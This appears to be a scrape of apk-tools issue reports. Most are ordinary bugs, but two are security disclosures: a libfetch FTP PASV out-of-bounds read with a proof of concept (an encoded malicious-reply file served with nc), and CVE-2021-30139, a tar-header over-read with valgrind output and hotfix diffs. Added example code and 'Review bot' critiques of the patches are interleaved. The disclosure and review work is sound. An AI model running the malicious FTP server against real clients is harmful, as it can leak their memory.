apk-tools issues
https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues
2021-08-14T00:34:25Z

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10749
libfetch information leak or crash (2021-08-14T00:34:25Z, Samanta Navarro)

Dear Alpine Linux team,
I have discovered a potentially security-relevant issue in libfetch.
It is used in apk and I have reported the issue to FreeBSD upstream.
Maybe you want to be informed about this before it is fixed there.
This is the mail I have just sent to the FreeBSD security team.
Problem:
The passive mode in FTP communication allows an out-of-bounds read
while libfetch uses strtol to parse the relevant numbers into address
bytes. It does not check if the line ends prematurely. If it does,
the for-loop condition checks for *p == '\0' one byte too late because
p++ was already performed.
Impact:
The connection buffer size can be controlled by a malicious FTP server
because the size is increased until a newline is encountered (or no more
characters are read). This also allows moving the buffer into more
interesting areas within the address space, potentially parsing
relevant numbers for the attacker.
Since these bytes become available to the server in form of a new
TCP connection to a constructed port number or even part of the IPv6
address this is a potential information leak.
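The following is an added example, not part of this mail, the FreeBSD patch or libfetch itself: it reproduces the loop shape described in the Problem paragraph on a constructed buffer (so the demonstration stays inside one array and is not itself undefined behaviour) and puts a stricter parser beside it. `STALE_MEMORY`, `parse_pasv_vulnerable`, `parse_pasv_fixed` and `pasv_port` are names chosen for the example.

```c
#include <stdio.h>
#include <stdlib.h>

#define PASV_FIELDS 6 /* h1,h2,h3,h4,p1,p2 */

/* Constructed input, not taken from the report: the server's PASV
 * argument is "1,2,3" and ends at the first NUL.  The bytes after that
 * terminator stand in for whatever follows the connection buffer in
 * memory; the trailing NULs keep the vulnerable loop's final *p read
 * inside this array so the demonstration itself stays defined. */
static const char STALE_MEMORY[] = "1,2,3\0" "9,8,7\0\0";

/* Loop shape of ftp.c before the patch: strtol leaves p on the
 * terminator, the for-step applies p++ anyway, and the next `*p` test
 * and strtol call read whatever lies past the end of the line. */
static int parse_pasv_vulnerable(const char *p, long addr[PASV_FIELDS])
{
	int i;
	char *end;

	for (i = 0; *p && i < PASV_FIELDS; i++, p++) {
		addr[i] = strtol(p, &end, 10);
		p = end;
	}
	return i < PASV_FIELDS ? -1 : 0;
}

/* Stricter replacement: each field must start with a digit, fit in one
 * byte and be followed by a comma (except the last), so a line that ends
 * early is a protocol error rather than a read past the terminator. */
static int parse_pasv_fixed(const char *p, long addr[PASV_FIELDS])
{
	int i;

	for (i = 0; i < PASV_FIELDS; i++) {
		char *end;

		if (*p < '0' || *p > '9')
			return -1;    /* also rejects strtol's "-1", "+1", " 1" */
		addr[i] = strtol(p, &end, 10);
		if (addr[i] > 255)
			return -1;    /* address octets and port bytes are 8-bit */
		p = end;
		if (i == PASV_FIELDS - 1)
			break;
		if (*p != ',')
			return -1;    /* line ended early or wrong separator */
		p++;
	}
	return 0;
}

/* Data port the client would connect back to: p1 * 256 + p2. */
static long pasv_port(const long addr[PASV_FIELDS])
{
	return addr[4] * 256 + addr[5];
}

int main(void)
{
	long addr[PASV_FIELDS];
	int i;

	if (parse_pasv_vulnerable(STALE_MEMORY, addr) == 0) {
		printf("vulnerable parser accepted the short line; fields:");
		for (i = 0; i < PASV_FIELDS; i++)
			printf(" %ld", addr[i]);
		printf(" -> would connect to port %ld\n", pasv_port(addr));
	}
	printf("fixed parser on the same line: %d\n",
	       parse_pasv_fixed(STALE_MEMORY, addr));
	return 0;
}
```

The vulnerable parser "succeeds" on the short line and reports 1,2,3,9,8,7, where the last three values were never part of the reply: that is the mechanism by which bytes beyond the line end up in the address and port the client connects to. The fixed parser rejects the same line at the third field.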
Proof of Concept:
Set up the malicious FTP server like this
```
cat > replies.txt.b64 << EOF
begin-base64 644 replies.txt
MjIwIG9rCjIzMCBvawoyNTcgIi8iCjIwMCBvawoyMDAgb2sKMjEzIDE4NDQ2NzQ0MDczNzA5NTUx
NjE2CjIxMyAwMDAwMDAwMDAwMDAwMAoyMDAgb2sKMjAwIG9rCjIyOCAxCjIyOCAxMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTEx
====
EOF
b64decode -o replies.txt replies.txt.b64   # FreeBSD uudecode front end; GNU sharutils' uudecode also reads begin-base64 input
nc -Nl ::1 21 < replies.txt                # serve the canned control-channel replies on port 21, close after EOF
```
Compile libfetch and fetch with
CFLAGS="-fsanitize=address -fsanitize=undefined" and start the client
```
fetch 'ftp://[::1]/poc'
```
Considerations:
Since libfetch is used outside of FreeBSD as well, e.g. in Alpine Linux
package keeper apk, I recommend issuing a CVE for this so these
users are informed about the patch as well.
The information leak is fixed in the second ftp.c patch chunk.
Sincerely,
Samanta
```
Index: fetch.c
===================================================================
--- fetch.c (revision 370066)
+++ fetch.c (working copy)
@@ -421,7 +421,7 @@
/* port */
if (*p == ':') {
for (n = 0, q = ++p; *q && (*q != '/'); q++) {
- if (*q >= '0' && *q <= '9' && n < INT_MAX / 10) {
+ if (*q >= '0' && *q <= '9' && n < IPPORT_MAX) {
n = n * 10 + (*q - '0');
} else {
/* invalid port */
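Review bot: the new `n < IPPORT_MAX` guard on the `+` line is evaluated before the multiply, so it only stops accumulation once n has already reached 65535; a port such as 70000 passes every iteration (n is 7000 when the last digit is read) and leaves the loop with n out of range, so this must not be read as a port-range validation and a post-loop `n > IPPORT_MAX` rejection is still required. As an overflow guard it is fine (n stays far below INT_MAX / 10 before the `n * 10 + (*q - '0')` step), so a one-line comment stating which of the two jobs the condition does would stop the next reader from assuming it does both.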
Index: ftp.c
===================================================================
--- ftp.c (revision 370066)
+++ ftp.c (working copy)
@@ -424,8 +424,14 @@
}
for (ln = conn->buf + 4; *ln && isspace((unsigned char)*ln); ln++)
/* nothing */ ;
- for (us->size = 0; *ln && isdigit((unsigned char)*ln); ln++)
+ for (us->size = 0; *ln && isdigit((unsigned char)*ln); ln++) {
+ if (us->size > OFF_MAX / 10 - (*ln - '0')) {
+ ftp_seterr(FTP_PROTOCOL_ERROR);
+ us->size = -1;
+ return (-1);
+ }
us->size = us->size * 10 + *ln - '0';
+ }
if (*ln && !isspace((unsigned char)*ln)) {
ftp_seterr(FTP_PROTOCOL_ERROR);
us->size = -1;
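Review bot: the guard `us->size > OFF_MAX / 10 - (*ln - '0')` is correct (slightly conservative, since OFF_MAX / 10 - d <= (OFF_MAX - d) / 10) and is what turns the `213 18446744073709551616` reply in the proof of concept into FTP_PROTOCOL_ERROR instead of a wrapped size. Two points: OFF_MAX comes from FreeBSD's <sys/limits.h>, so the apk-tools fork of libfetch needs a fallback definition for this to build against musl; and the three new lines inside the loop duplicate the block immediately below (`ftp_seterr(FTP_PROTOCOL_ERROR); us->size = -1;`), which already fires when the loop stops on a non-space character, so a plain `break;` at the overflow point gives the same result through the existing error path.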
@@ -704,8 +710,11 @@
goto ouch;
}
l = (e == FTP_PASSIVE_MODE ? 6 : 21);
- for (i = 0; *p && i < l; i++, p++)
+ for (i = 0; *p && i < l; i++, p++) {
addr[i] = strtol(p, &p, 10);
+ if (*p == '\0' && i < l - 1)
+ break;
+ }
if (i < l) {
e = FTP_PROTOCOL_ERROR;
goto ouch;
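Review bot: the break in this hunk still leaves one out-of-bounds read. The condition `*p && i < l` tests *p before i < l, so when the last field (i == l - 1) ends exactly at the terminator the `i < l - 1` qualifier does not fire, the `i++, p++` step moves p one past the NUL, and the next condition evaluation dereferences it before `i < l` stops the loop. Drop the `i < l - 1` qualifier (after an early end, `i < l` already reports the incomplete address), or swap the condition to `i < l && *p` so the index is checked first. Also note that strtol accepts leading whitespace and a sign, so a field such as `-1` still lands in addr[]; a per-field 0..255 range check belongs with this fix.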
Index: http.c
===================================================================
--- http.c (revision 370066)
+++ http.c (working copy)
@@ -163,11 +163,15 @@
if (!isxdigit((unsigned char)*p))
return (-1);
if (isdigit((unsigned char)*p)) {
+ if (io->chunksize > OFF_MAX / 16 - (*p - '0'))
+ return (-1);
io->chunksize = io->chunksize * 16 +
*p - '0';
} else {
- io->chunksize = io->chunksize * 16 +
- 10 + tolower((unsigned char)*p) - 'a';
+ int digit = 10 + tolower((unsigned char)*p) - 'a';
+ if (io->chunksize > OFF_MAX / 16 - digit)
+ return (-1);
+ io->chunksize = io->chunksize * 16 + digit;
}
}
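Review bot: the overflow guard is duplicated across the decimal and a..f branches with the digit value derived twice in different ways. Compute `digit` once before the `if (isdigit(...))` test (0..9 or 10..15), then apply a single `if (io->chunksize > OFF_MAX / 16 - digit) return (-1);` and one `io->chunksize = io->chunksize * 16 + digit;`, which keeps the two branches from drifting apart and removes the declaration inside the else block.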
@@ -908,8 +912,11 @@
{
off_t len;
- for (len = 0; *p && isdigit((unsigned char)*p); ++p)
+ for (len = 0; *p && isdigit((unsigned char)*p); ++p) {
+ if (len > OFF_MAX / 10 - (*p - '0'))
+ return (-1);
len = len * 10 + (*p - '0');
+ }
if (*p)
return (-1);
DEBUGF("content length: [%lld]\n", (long long)len);
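Review bot: this loop repeats the bounded decimal parse already hand-written for SIZE in ftp.c, and the Content-Range hunk below carries three more copies. A small helper such as `static int parse_off(const char **p, off_t *out)` doing the digit loop and the `OFF_MAX / 10 - digit` check in one place would make all the sites identical and testable, so a later correction is applied once rather than five times. The check itself is right for this hunk, and the `if (*p) return (-1);` that follows still rejects trailing garbage.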
@@ -932,17 +939,26 @@
first = last = -1;
++p;
} else {
- for (first = 0; *p && isdigit((unsigned char)*p); ++p)
+ for (first = 0; *p && isdigit((unsigned char)*p); ++p) {
+ if (first > OFF_MAX / 10 - (*p - '0'))
+ return (-1);
first = first * 10 + *p - '0';
+ }
if (*p != '-')
return (-1);
- for (last = 0, ++p; *p && isdigit((unsigned char)*p); ++p)
+ for (last = 0, ++p; *p && isdigit((unsigned char)*p); ++p) {
+ if (last > OFF_MAX / 10 - (*p - '0'))
+ return (-1);
last = last * 10 + *p - '0';
+ }
}
if (first > last || *p != '/')
return (-1);
- for (len = 0, ++p; *p && isdigit((unsigned char)*p); ++p)
+ for (len = 0, ++p; *p && isdigit((unsigned char)*p); ++p) {
+ if (len > OFF_MAX / 10 - (*p - '0'))
+ return (-1);
len = len * 10 + *p - '0';
+ }
if (*p || len < last - first + 1)
return (-1);
if (first == -1) {
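Review bot: with `first` and `last` each now bounded by OFF_MAX, the unchanged comparison `len < last - first + 1` can still overflow: for first == 0 and last == OFF_MAX the right-hand side is OFF_MAX + 1, signed overflow on off_t. Rewrite it without the + 1, e.g. `len - 1 < last - first` (len is non-negative here, so the subtraction cannot wrap) or `last - first >= len`, keeping the same rejection semantics.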
```

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10748
apk fails to locate database on read-only root (2021-07-23T12:13:11Z, Alan Diwix)

It's completely understandable to refuse to do any system-modifying commands, however ANY command (even such as `apk search` or `apk info`) will fail with:
```
ERROR: Failed to open apk database: No such file or directory
```
contents of `/lib/apk/db`:
```
installed
lock
scripts.tar
triggers
```
If I try the same commands on root mounted as rw, everything works as expected.

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10747
When a package stops replacing a file, that file gets uninstalled completely rather than switching back to the version of the original providing package (2022-12-21T18:50:51Z, Bart Ribbers)

In postmarketOS we are currently overwriting `/etc/sudoers` from sudo in one of our packages but we want to stop doing that in [pmaports!2181](https://gitlab.com/postmarketOS/pmaports/-/merge_requests/2181). However, while testing this change we noticed that rather than the file being either reverted back to what sudo itself provides or just being left there, it would get uninstalled instead.
This seems strange, seeing there is still a package on the system that provides (and needs!) that file; it's just the original providing package again. To "fix" it we need to reinstall sudo to let it put its own file back again, but of course we can't tell all our users to manually run `apk fix sudo` after a random system upgrade.
Milestone: v3.1

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10746
`apk search` command is not documented (2021-07-23T12:13:11Z, Valentin)

For example
```
apk search firefox
firefox-esr-78.11.0-r0
firefox-esr-npapi-78.11.0-r0
faenza-icon-theme-firefox-1.3.1-r6
firefox-npapi-89.0-r0
firefox-89.0-r0
```
but `apk --help` does not mention this command.

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10745
Allow repository precedence when multiple instances of the same repository exist in /etc/apk/repositories (2022-12-21T20:01:44Z, Morgan Hein)

I have the following situation:
- Repository A is a custom compiled set of packages that also exist in
the public repository. This repository has the pkgs compiled with
extra security features and/or some unique flags set.
- Repository B is a full mirror of the official repository.
What I'd like to happen is to list both repositories in the
/etc/apk/repositories file, and have the clients prefer downloading all
pkgs from Repo A. In the case that the file doesn’t exist in Repo A,
then download from Repo B.
This, currently, doesn’t seem possible. After adding both repositories,
clients sometimes download from A, and sometimes download from B,
regardless of what is available in A.
The ability to add multiple repositories, with precedence, would be very
helpful in this situation.
Thanks,
Morgan
*(from redmine: issue id 9409, created on 2018-09-11)*
Milestone: backlog

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10744
Cryptographic module abstraction (2022-12-21T19:37:21Z, Ariadne Conill)

At present, apk-tools makes direct use of libcrypto to do signature verification, signing, etc.
It would be nice to factor this out so that we can eventually drop the libcrypto dependency with something better.
Similarly, it would be nice to replace our use of libssl with libtls in our libfetch fork, for the same reason: multiple libtls implementations exist, and we can just use whatever one we want (for now, libtls-standalone, but later perhaps libtls-bearssl instead.)
Milestone: v3.1

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10743
lbu commit fails storing correct permissions on lbu include directories (2022-08-02T19:17:39Z, macmpi)

I'm running Alpine 3.13 on a disk-less setup and installed mpd.\
I need to save/restore some music files within `/var/lib/mpd/music`\
`/var/lib/mpd/music` is created at mpd install with mpd:audio\
If I add a file root:root as `/var/lib/mpd/music/test` and then `lbu include /var/lib/mpd/music/test` and `lbu commit -d`, then at reboot `/var/lib/mpd` and `/var/lib/mpd/music` become root:root and original permissions are altered.
Any suggested workaround?
Note: this looks similar to older issue https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/1241

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10742
solver: Highest requirer count over provider_priority (2021-07-23T12:23:35Z, Alex Denes)

Considering the higher requirer count over priority causes conflicts where a package has many `provides`.
This has been observed in the case of `pipewire-pulse` replacing `pulseaudio` because it also provides `pulseaudio-alsa`.
- https://gitlab.alpinelinux.org/alpine/aports/-/blob/df9236a95b5db68764a945b6c38a1a5e5d99d51d/community/pipewire/APKBUILD#L49-50
- https://gitlab.alpinelinux.org/alpine/aports/-/blob/df9236a95b5db68764a945b6c38a1a5e5d99d51d/community/pulseaudio/APKBUILD#L11
Source:
- https://gitlab.alpinelinux.org/alpine/apk-tools/-/blob/f7143c1766ae59489ac922e890ffe6d4a61c3b2d/src/solver.c#L600-605
- https://gitlab.alpinelinux.org/alpine/apk-tools/-/blob/f7143c1766ae59489ac922e890ffe6d4a61c3b2d/src/solver.c#L646-651
Simply taking the provider priority over requirer count solves this problem.

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10741
[CVE-2021-30139] Out-of-bounds read during tar parsing (2021-04-14T08:43:50Z, Sören Tempel)

## Description
apk performs insufficient sanity checks on tar entries. The [GNU Tar format specification](https://www.gnu.org/software/tar/manual/html_node/Standard.html) states the following on fields in tar entries:
> The `name`, `linkname`, `magic`, `uname`, and `gname` are null-terminated character strings. All other fields are zero-filled octal numbers in ASCII.
The code for parsing tar entries in apk is here:
https://gitlab.alpinelinux.org/alpine/apk-tools/-/blob/354713d2f746c197eed6a1feb4c6af3420af6c15/src/io_archive.c#L143
This code just **assumes** that `uname`, etc. are null-terminated and uses string functions on them without a prior check if null terminators are actually present. For example:
```C
.uid = apk_resolve_uid(idc, buf.uname, GET_OCTAL(buf.uid)),
```
will use `strlen()` internally on `buf.uname`. This will cause an out-of-bounds read. This code is run before the signature is validated.
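As an added example (not apk's code and not part of this report), the check the description calls for, written against the POSIX ustar layout: every string field is tested for a terminator with `memchr` over its fixed size before anything treats it as a C string, and numeric fields are parsed with a bounded octal reader instead of a terminator-dependent one. `tar_header_validate`, `get_octal`, `build_good_header` and `poison_uname` are names chosen for the example, and the headers are constructed, not taken from any real archive.

```c
#include <limits.h>
#include <stddef.h>
#include <string.h>

/* POSIX ustar header layout (512 bytes, all char, so no padding).  The
 * format promises the string fields are NUL-terminated; a crafted
 * archive does not. */
struct tar_header {
	char name[100];
	char mode[8];
	char uid[8];
	char gid[8];
	char size[12];
	char mtime[12];
	char chksum[8];
	char typeflag;
	char linkname[100];
	char magic[6];
	char version[2];
	char uname[32];
	char gname[32];
	char devmajor[8];
	char devminor[8];
	char prefix[155];
	char pad[12];
};

/* True if the fixed-size array holds a NUL somewhere.  Only valid on
 * array lvalues: sizeof must see the field itself, not a pointer. */
#define HAS_NULLTERM(f) (memchr((f), '\0', sizeof(f)) != NULL)

/* Bounded octal parse: stops at NUL or space (both terminate numeric
 * fields in practice), rejects any other byte and any value that would
 * overflow, and never reads past len. */
static int get_octal(const char *s, size_t len, unsigned long *out)
{
	unsigned long v = 0;
	size_t i;

	for (i = 0; i < len && s[i] != '\0' && s[i] != ' '; i++) {
		if (s[i] < '0' || s[i] > '7')
			return -1;
		if (v > (ULONG_MAX >> 3))
			return -1;
		v = (v << 3) | (unsigned long)(s[i] - '0');
	}
	*out = v;
	return 0;
}
#define GET_OCTAL(f, out) get_octal((f), sizeof(f), (out))

/* Run before any strlen()/strcmp()-style use of the string fields.
 * Returns 0 when they are safe to treat as C strings, -1 otherwise.
 * (An all-zero end-of-archive block also returns -1 here; callers
 * detect that block separately, before validating it as an entry.) */
static int tar_header_validate(const struct tar_header *h)
{
	if (!HAS_NULLTERM(h->name) || !HAS_NULLTERM(h->linkname) ||
	    !HAS_NULLTERM(h->uname) || !HAS_NULLTERM(h->gname))
		return -1;
	/* Old GNU archives write "ustar " here with the NUL in version[],
	 * so compare the prefix instead of demanding a NUL inside magic. */
	if (memcmp(h->magic, "ustar", 5) != 0)
		return -1;
	return 0;
}

/* Constructed well-formed header (not taken from any real archive). */
static void build_good_header(struct tar_header *h)
{
	memset(h, 0, sizeof(*h));
	strcpy(h->name, "etc/passwd");
	memcpy(h->mode, "0000644", 8);      /* 7 digits + NUL */
	memcpy(h->size, "00000001234", 12); /* 11 digits + NUL */
	h->typeflag = '0';
	memcpy(h->magic, "ustar", 6);       /* "ustar" + NUL */
	memcpy(h->version, "00", 2);
	strcpy(h->uname, "root");
	strcpy(h->gname, "root");
}

/* Crafted variant: uname filled to its full 32 bytes with no NUL, the
 * condition under which strlen() runs on into gname and beyond. */
static void poison_uname(struct tar_header *h)
{
	memset(h->uname, 'A', sizeof(h->uname));
}
```

The rejection has to happen at this point, before uid/gid resolution or any other consumer of the fields runs, because the header is processed before the signature check and the attacker controls every byte of it.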
## Reproducing
This issue can be reproduced using [out-of-bounds-read-apk-tar-uname.apk](/uploads/bbb6de44db177aaeab78099617ccc71f/out-of-bounds-read-apk-tar-uname.apk) and `valgrind`:
```
$ valgrind ./src/apk.static add /tmp/out-of-bounds-read-apk-tar-uname.apk
==31584== Memcheck, a memory error detector
==31584== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==31584== Using Valgrind-3.17.0 and LibVEX; rerun with -h for copyright info
==31584== Command: ./src/apk.static --initdb --root ./root/ add /tmp/out-of-bounds-read-apk-tar-uname.apk
==31584==
==31584== Warning: invalid file descriptor -1 in syscall read()
==31584== Warning: invalid file descriptor -1 in syscall close()
==31584== Warning: invalid file descriptor -1 in syscall read()
==31584== Warning: invalid file descriptor -1 in syscall close()
==31584== Conditional jump or move depends on uninitialised value(s)
==31584== at 0x5C8CA5: strlen (strlen.c:17)
==31584== by 0x432575: APK_BLOB_STR (apk_blob.h:79)
==31584== by 0x4350EB: apk_resolve_uid (io.c:1112)
==31584== by 0x43696C: apk_tar_parse (io_archive.c:152)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Conditional jump or move depends on uninitialised value(s)
==31584== at 0x5C8CB0: strlen (strlen.c:20)
==31584== by 0x432575: APK_BLOB_STR (apk_blob.h:79)
==31584== by 0x4350EB: apk_resolve_uid (io.c:1112)
==31584== by 0x43696C: apk_tar_parse (io_archive.c:152)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Use of uninitialised value of size 8
==31584== at 0x4313FB: apk_hash_get_hashed (hash.c:61)
==31584== by 0x434F73: resolve_cache_item (io.c:1064)
==31584== by 0x435107: apk_resolve_uid (io.c:1112)
==31584== by 0x43696C: apk_tar_parse (io_archive.c:152)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Use of uninitialised value of size 8
==31584== at 0x4310F0: hlist_add_head (apk_defines.h:231)
==31584== by 0x4314F4: apk_hash_insert_hashed (hash.c:78)
==31584== by 0x434FF1: resolve_cache_item (io.c:1074)
==31584== by 0x435107: apk_resolve_uid (io.c:1112)
==31584== by 0x43696C: apk_tar_parse (io_archive.c:152)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Use of uninitialised value of size 8
==31584== at 0x431118: hlist_add_head (apk_defines.h:234)
==31584== by 0x4314F4: apk_hash_insert_hashed (hash.c:78)
==31584== by 0x434FF1: resolve_cache_item (io.c:1074)
==31584== by 0x435107: apk_resolve_uid (io.c:1112)
==31584== by 0x43696C: apk_tar_parse (io_archive.c:152)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Warning: invalid file descriptor -1 in syscall read()
==31584== Warning: invalid file descriptor -1 in syscall close()
==31584== Conditional jump or move depends on uninitialised value(s)
==31584== at 0x5C8CA5: strlen (strlen.c:17)
==31584== by 0x432575: APK_BLOB_STR (apk_blob.h:79)
==31584== by 0x435207: apk_resolve_gid (io.c:1154)
==31584== by 0x4369A9: apk_tar_parse (io_archive.c:153)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Conditional jump or move depends on uninitialised value(s)
==31584== at 0x5C8CB0: strlen (strlen.c:20)
==31584== by 0x432575: APK_BLOB_STR (apk_blob.h:79)
==31584== by 0x435207: apk_resolve_gid (io.c:1154)
==31584== by 0x4369A9: apk_tar_parse (io_archive.c:153)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Use of uninitialised value of size 8
==31584== at 0x4313FB: apk_hash_get_hashed (hash.c:61)
==31584== by 0x434F73: resolve_cache_item (io.c:1064)
==31584== by 0x435223: apk_resolve_gid (io.c:1154)
==31584== by 0x4369A9: apk_tar_parse (io_archive.c:153)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Use of uninitialised value of size 8
==31584== at 0x4310F0: hlist_add_head (apk_defines.h:231)
==31584== by 0x4314F4: apk_hash_insert_hashed (hash.c:78)
==31584== by 0x434FF1: resolve_cache_item (io.c:1074)
==31584== by 0x435223: apk_resolve_gid (io.c:1154)
==31584== by 0x4369A9: apk_tar_parse (io_archive.c:153)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Use of uninitialised value of size 8
==31584== at 0x431118: hlist_add_head (apk_defines.h:234)
==31584== by 0x4314F4: apk_hash_insert_hashed (hash.c:78)
==31584== by 0x434FF1: resolve_cache_item (io.c:1074)
==31584== by 0x435223: apk_resolve_gid (io.c:1154)
==31584== by 0x4369A9: apk_tar_parse (io_archive.c:153)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Warning: invalid file descriptor -1 in syscall read()
==31584== Warning: invalid file descriptor -1 in syscall close()
ERROR: /tmp/out-of-bounds-read-apk-tar-uname.apk: BAD archive
==31584==
==31584== HEAP SUMMARY:
==31584== in use at exit: 0 bytes in 0 blocks
==31584== total heap usage: 0 allocs, 0 frees, 0 bytes allocated
==31584==
==31584== All heap blocks were freed -- no leaks are possible
==31584==
==31584== Use --track-origins=yes to see where uninitialised values come from
==31584== For lists of detected and suppressed errors, rerun with: -s
==31584== ERROR SUMMARY: 16 errors from 10 contexts (suppressed: 0 from 0)
```
## Hotfix
```diff
diff --git a/src/io_archive.c b/src/io_archive.c
index de4741e..d68263b 100644
--- a/src/io_archive.c
+++ b/src/io_archive.c
@@ -51,6 +51,7 @@ struct tar_header {
#define GET_OCTAL(s) get_octal(s, sizeof(s))
#define PUT_OCTAL(s,v) put_octal(s, sizeof(s), v)
+#define HAS_NULLTERM(a) memchr(a, '\0', sizeof(a))
static unsigned int get_octal(char *s, size_t l)
{
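Review bot: `HAS_NULLTERM(a)` only does the right thing on an array lvalue, since `sizeof(a)` on a pointer would be the pointer size, and the bare `memchr` result is used under `!` at the call site; parenthesize the argument and make the result a boolean, e.g. `#define HAS_NULLTERM(a) (memchr((a), '\0', sizeof(a)) != NULL)`, with a comment saying it must be applied to the header's array fields, not to a `char *`.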
@@ -147,6 +148,14 @@ int apk_tar_parse(struct apk_istream *is, apk_archive_entry_parser parser,
continue;
}
+ /* Ensure that fields which should be null-terminated
+ * are null-terminated to use string functions on them. */
+ if (!HAS_NULLTERM(buf.uname) || !HAS_NULLTERM(buf.gname) ||
+ !HAS_NULLTERM(buf.linkname) || !HAS_NULLTERM(buf.magic) ||
+ !HAS_NULLTERM(buf.name)) {
+ goto err;
+ }
+
entry = (struct apk_file_info){
.size = GET_OCTAL(buf.size),
.uid = apk_resolve_uid(idc, buf.uname, GET_OCTAL(buf.uid)),
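Review bot: the `!HAS_NULLTERM(buf.magic)` term needs checking against archives in the old GNU format, where the six magic bytes hold "ustar " and the terminator lives in version[], so memchr over magic alone finds no NUL and such archives would now hit `goto err`. If apk only ever consumes its own ustar-style archives, say so in the comment; otherwise compare magic with memcmp against the expected prefix and keep the terminator check for name, linkname, uname and gname, which are the fields the report shows strlen() running off.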
```
Assignee: Timo Teräs

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10740
adbdump produces invalid YAML (2022-12-21T19:37:21Z, Ariadne Conill)

The YAML generated by the `adbdump` applet does not validate when processed with `yq`.
For example, `./src/apk adbdump ./installed.adb | yq e '.packages[0]'` generates a document which fails validation if coreutils is installed due to `/usr/bin/[`.
This is probably something @fabled is already aware of, but I figure opening a bug about it is better than not.
Milestone: v3.1

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10739
Split fetch I/O into separate process (2022-12-21T19:37:22Z, Ariadne Conill)

In the beginning, we used to use a separate process for fetches.
I think it would be nice to reimplement this in a way similar to `apt`, where there would be `/lib/apk/methods/http` and so on.
It would also be nice to drop root privileges when fetching.
Milestone: v3.1

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10738
apk authenticated proxy issue (2021-09-28T18:22:04Z, Torben Neufeldt)

Hey!
Using apk to install stuff behind a proxy does not work.
It seems that there are no credentials provided to the proxy.
This occurs only when requesting https urls.
The following commands provide a quick way to reproduce this issue.
You can use [squid.conf](/uploads/c361a5a4861219f50f509b2eaf2d5305/squid.conf) as squid config.
## How to reproduce?
Terminal 1:
